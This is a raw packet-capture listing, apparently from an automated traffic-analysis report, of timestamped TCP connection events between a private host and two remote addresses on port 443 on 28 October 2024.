                                                                    Oct 28, 2024 14:03:34.868199110 CET4434986713.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:34.868307114 CET49867443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:34.868473053 CET49867443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:34.868489981 CET4434986713.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:34.891601086 CET4434986313.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:34.891756058 CET4434986313.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:34.891809940 CET49863443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:34.891861916 CET49863443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:34.891877890 CET4434986313.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:34.891892910 CET49863443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:34.891899109 CET4434986313.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:34.893695116 CET49868443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:34.893776894 CET4434986813.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:34.893944025 CET49868443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:34.894078016 CET49868443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:34.894102097 CET4434986813.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:34.929208040 CET4434986413.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:34.929341078 CET4434986413.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:34.929429054 CET49864443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:34.929500103 CET49864443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:34.929534912 CET4434986413.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:34.929569960 CET49864443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:34.929584980 CET4434986413.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:34.931473970 CET49869443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:34.931498051 CET4434986913.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:34.931571007 CET49869443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:34.931726933 CET49869443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:34.931735039 CET4434986913.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:34.956653118 CET4434986513.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:34.956796885 CET4434986513.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:34.956868887 CET49865443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:34.956911087 CET49865443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:34.956933975 CET4434986513.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:34.956964970 CET49865443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:34.956971884 CET4434986513.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:34.958554983 CET49870443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:34.958583117 CET4434987013.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:34.958811998 CET49870443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:34.958923101 CET49870443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:34.958947897 CET4434987013.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:35.504415035 CET4434986613.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:35.505053997 CET49866443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:35.505129099 CET4434986613.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:35.505517006 CET49866443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:35.505530119 CET4434986613.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:35.635582924 CET4434986613.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:35.635746002 CET4434986613.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:35.635811090 CET49866443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:35.636028051 CET49866443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:35.636046886 CET4434986613.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:35.636061907 CET49866443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:35.636069059 CET4434986613.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:35.638822079 CET4434986813.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:35.639538050 CET49868443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:35.639635086 CET4434986813.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:35.641516924 CET49868443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:35.641535044 CET4434986813.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:35.646503925 CET4434986713.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:35.647789001 CET49867443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:35.647814035 CET4434986713.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:35.648257971 CET49867443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:35.648263931 CET4434986713.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:35.648384094 CET49871443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:35.648412943 CET4434987113.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:35.648468018 CET49871443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:35.648605108 CET49871443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:35.648612022 CET4434987113.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:35.677056074 CET4434986913.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:35.677376986 CET49869443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:35.677392006 CET4434986913.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:35.677757978 CET49869443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:35.677761078 CET4434986913.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:35.698087931 CET4434987013.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:35.698467016 CET49870443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:35.698492050 CET4434987013.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:35.698842049 CET49870443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:35.698867083 CET4434987013.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:35.768855095 CET4434986813.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:35.769007921 CET4434986813.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:35.769927025 CET49868443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:35.770066023 CET49868443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:35.770127058 CET4434986813.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:35.770163059 CET49868443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:35.770179033 CET4434986813.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:35.773158073 CET49872443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:35.773189068 CET4434987213.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:35.773396015 CET49872443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:35.773521900 CET49872443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:35.773530960 CET4434987213.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:35.783472061 CET4434986713.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:35.783667088 CET4434986713.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:35.784107924 CET49867443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:35.784184933 CET49867443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:35.784193993 CET4434986713.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:35.784207106 CET49867443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:35.784212112 CET4434986713.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:35.787158012 CET49873443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:35.787209988 CET4434987313.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:35.787275076 CET49873443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:35.787410975 CET49873443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:35.787426949 CET4434987313.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:35.810959101 CET4434986913.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:35.811146021 CET4434986913.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:35.811356068 CET49869443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:35.811400890 CET49869443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:35.811413050 CET4434986913.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:35.811424017 CET49869443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:35.811428070 CET4434986913.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:35.813863039 CET49874443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:35.813888073 CET4434987413.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:35.814162970 CET49874443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:35.814191103 CET49874443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:35.814196110 CET4434987413.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:35.830029011 CET4434987013.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:35.830185890 CET4434987013.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:35.830310106 CET49870443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:35.830384970 CET49870443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:35.830384970 CET49870443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:35.830425024 CET4434987013.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:35.830461979 CET4434987013.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:35.832668066 CET49875443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:35.832701921 CET4434987513.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:35.832926035 CET49875443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:35.832926035 CET49875443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:35.832977057 CET4434987513.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:36.425412893 CET4434987113.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:36.425914049 CET49871443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:36.425931931 CET4434987113.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:36.426498890 CET49871443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:36.426506042 CET4434987113.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:36.514818907 CET4434987313.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:36.515362978 CET49873443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:36.515435934 CET4434987313.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:36.515772104 CET49873443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:36.515785933 CET4434987313.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:36.527672052 CET4434987213.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:36.528038979 CET49872443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:36.528069019 CET4434987213.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:36.528578043 CET49872443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:36.528585911 CET4434987213.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:36.550275087 CET4434987413.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:36.550620079 CET49874443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:36.550647020 CET4434987413.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:36.551153898 CET49874443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:36.551160097 CET4434987413.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:36.554546118 CET4434987113.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:36.554703951 CET4434987113.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:36.554821014 CET49871443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:36.554873943 CET49871443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:36.554884911 CET4434987113.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:36.554905891 CET49871443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:36.554910898 CET4434987113.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:36.558012962 CET49876443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:36.558032036 CET4434987613.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:36.558125019 CET49876443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:36.558260918 CET49876443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:36.558268070 CET4434987613.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:36.574053049 CET4434987513.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:36.574410915 CET49875443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:36.574482918 CET4434987513.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:36.575408936 CET49875443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:36.575423956 CET4434987513.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:36.642770052 CET4434987313.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:36.642978907 CET4434987313.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:36.643075943 CET49873443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:36.643080950 CET4434987313.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:36.643151999 CET49873443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:36.643218994 CET49873443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:36.643218994 CET49873443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:36.643250942 CET4434987313.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:36.643275023 CET4434987313.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:36.646692991 CET49877443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:36.646774054 CET4434987713.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:36.646877050 CET49877443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:36.647074938 CET49877443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:36.647109032 CET4434987713.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:36.660911083 CET4434987213.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:36.661076069 CET4434987213.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:36.661216021 CET49872443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:36.661253929 CET49872443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:36.661267042 CET4434987213.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:36.661283016 CET49872443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:36.661288977 CET4434987213.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:36.664043903 CET49878443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:36.664055109 CET4434987813.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:36.664112091 CET49878443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:36.664324999 CET49878443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:36.664335966 CET4434987813.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:36.687087059 CET4434987413.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:36.687277079 CET4434987413.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:36.687333107 CET49874443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:36.687449932 CET49874443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:36.687455893 CET4434987413.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:36.687467098 CET49874443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:36.687472105 CET4434987413.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:36.691833019 CET49879443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:36.691910982 CET4434987913.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:36.691987038 CET49879443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:36.692375898 CET49879443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:36.692409992 CET4434987913.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:36.704850912 CET4434987513.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:36.704929113 CET4434987513.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:36.705029011 CET49875443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:36.705040932 CET4434987513.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:36.705265999 CET49875443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:36.708563089 CET49875443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:36.708605051 CET4434987513.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:36.708633900 CET49875443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:36.708650112 CET4434987513.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:36.712097883 CET49880443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:36.712193012 CET4434988013.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:36.712287903 CET49880443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:36.712470055 CET49880443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:36.712505102 CET4434988013.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:37.299673080 CET4434987613.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:37.300260067 CET49876443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:37.300277948 CET4434987613.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:37.300808907 CET49876443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:37.300812960 CET4434987613.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:37.388716936 CET4434987713.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:37.389395952 CET49877443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:37.389442921 CET4434987713.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:37.389986992 CET49877443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:37.390001059 CET4434987713.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:37.391865969 CET4434987813.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:37.392385006 CET49878443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:37.392393112 CET4434987813.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:37.393264055 CET49878443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:37.393268108 CET4434987813.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:37.430820942 CET4434987613.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:37.430990934 CET4434987613.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:37.431035042 CET49876443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:37.431190014 CET49876443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:37.431207895 CET4434987613.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:37.431222916 CET49876443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:37.431229115 CET4434987613.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:37.434489012 CET49881443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:37.434571981 CET4434988113.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:37.434644938 CET49881443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:37.434932947 CET49881443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:37.434968948 CET4434988113.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:37.443727016 CET4434987913.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:37.444092989 CET49879443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:37.444129944 CET4434987913.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:37.444617987 CET49879443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:37.444629908 CET4434987913.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:37.453519106 CET4434988013.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:37.453885078 CET49880443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:37.453958035 CET4434988013.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:37.454374075 CET49880443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:37.454389095 CET4434988013.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:37.520349026 CET4434987713.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:37.520431042 CET4434987713.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:37.520493031 CET49877443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:37.520603895 CET49877443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:37.520632029 CET4434987713.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:37.520657063 CET49877443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:37.520672083 CET4434987713.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:37.520735979 CET4434987813.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:37.520786047 CET4434987813.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:37.520823956 CET49878443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:37.520987034 CET49878443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:37.520993948 CET4434987813.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:37.521002054 CET49878443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:37.521004915 CET4434987813.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:37.523444891 CET49883443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:37.523448944 CET49882443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:37.523495913 CET4434988313.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:37.523529053 CET4434988213.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:37.523577929 CET49883443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:37.523602009 CET49882443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:37.523741007 CET49883443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:37.523766994 CET4434988313.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:37.523799896 CET49882443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:37.523832083 CET4434988213.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:37.575612068 CET4434987913.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:37.575680971 CET4434987913.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:37.575797081 CET4434987913.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:37.575807095 CET49879443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:37.575860977 CET49879443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:37.575922966 CET49879443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:37.575922966 CET49879443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:37.575942039 CET4434987913.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:37.575963020 CET4434987913.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:37.578382969 CET49884443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:37.578413963 CET4434988413.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:37.578469992 CET49884443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:37.578598022 CET49884443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:37.578630924 CET4434988413.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:37.583417892 CET4434988013.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:37.583574057 CET4434988013.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:37.583646059 CET49880443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:37.583712101 CET49880443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:37.583712101 CET49880443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:37.583746910 CET4434988013.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:37.583781958 CET4434988013.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:37.586178064 CET49885443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:37.586245060 CET4434988513.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:37.586431980 CET49885443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:37.586580992 CET49885443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:37.586612940 CET4434988513.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:37.946712017 CET44349826142.250.185.196192.168.2.4
                                                                    Oct 28, 2024 14:03:37.946860075 CET44349826142.250.185.196192.168.2.4
                                                                    Oct 28, 2024 14:03:37.946914911 CET49826443192.168.2.4142.250.185.196
                                                                    Oct 28, 2024 14:03:38.175865889 CET4434988113.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:38.176393032 CET49881443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:38.176465034 CET4434988113.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:38.176996946 CET49881443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:38.177016020 CET4434988113.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:38.250325918 CET4434988313.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:38.250885963 CET49883443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:38.250910997 CET4434988313.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:38.251421928 CET49883443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:38.251434088 CET4434988313.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:38.274794102 CET4434988213.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:38.275177956 CET49882443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:38.275253057 CET4434988213.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:38.275696993 CET49882443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:38.275712967 CET4434988213.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:38.305872917 CET4434988113.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:38.306092978 CET4434988113.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:38.306222916 CET49881443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:38.306271076 CET49881443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:38.306301117 CET4434988113.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:38.306333065 CET49881443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:38.306349993 CET4434988113.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:38.309289932 CET49886443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:38.309324026 CET4434988613.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:38.309488058 CET49886443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:38.309741974 CET49886443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:38.309758902 CET4434988613.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:38.340339899 CET4434988413.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:38.340682983 CET49884443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:38.340698004 CET4434988413.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:38.341130972 CET49884443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:38.341135979 CET4434988413.107.246.60192.168.2.4
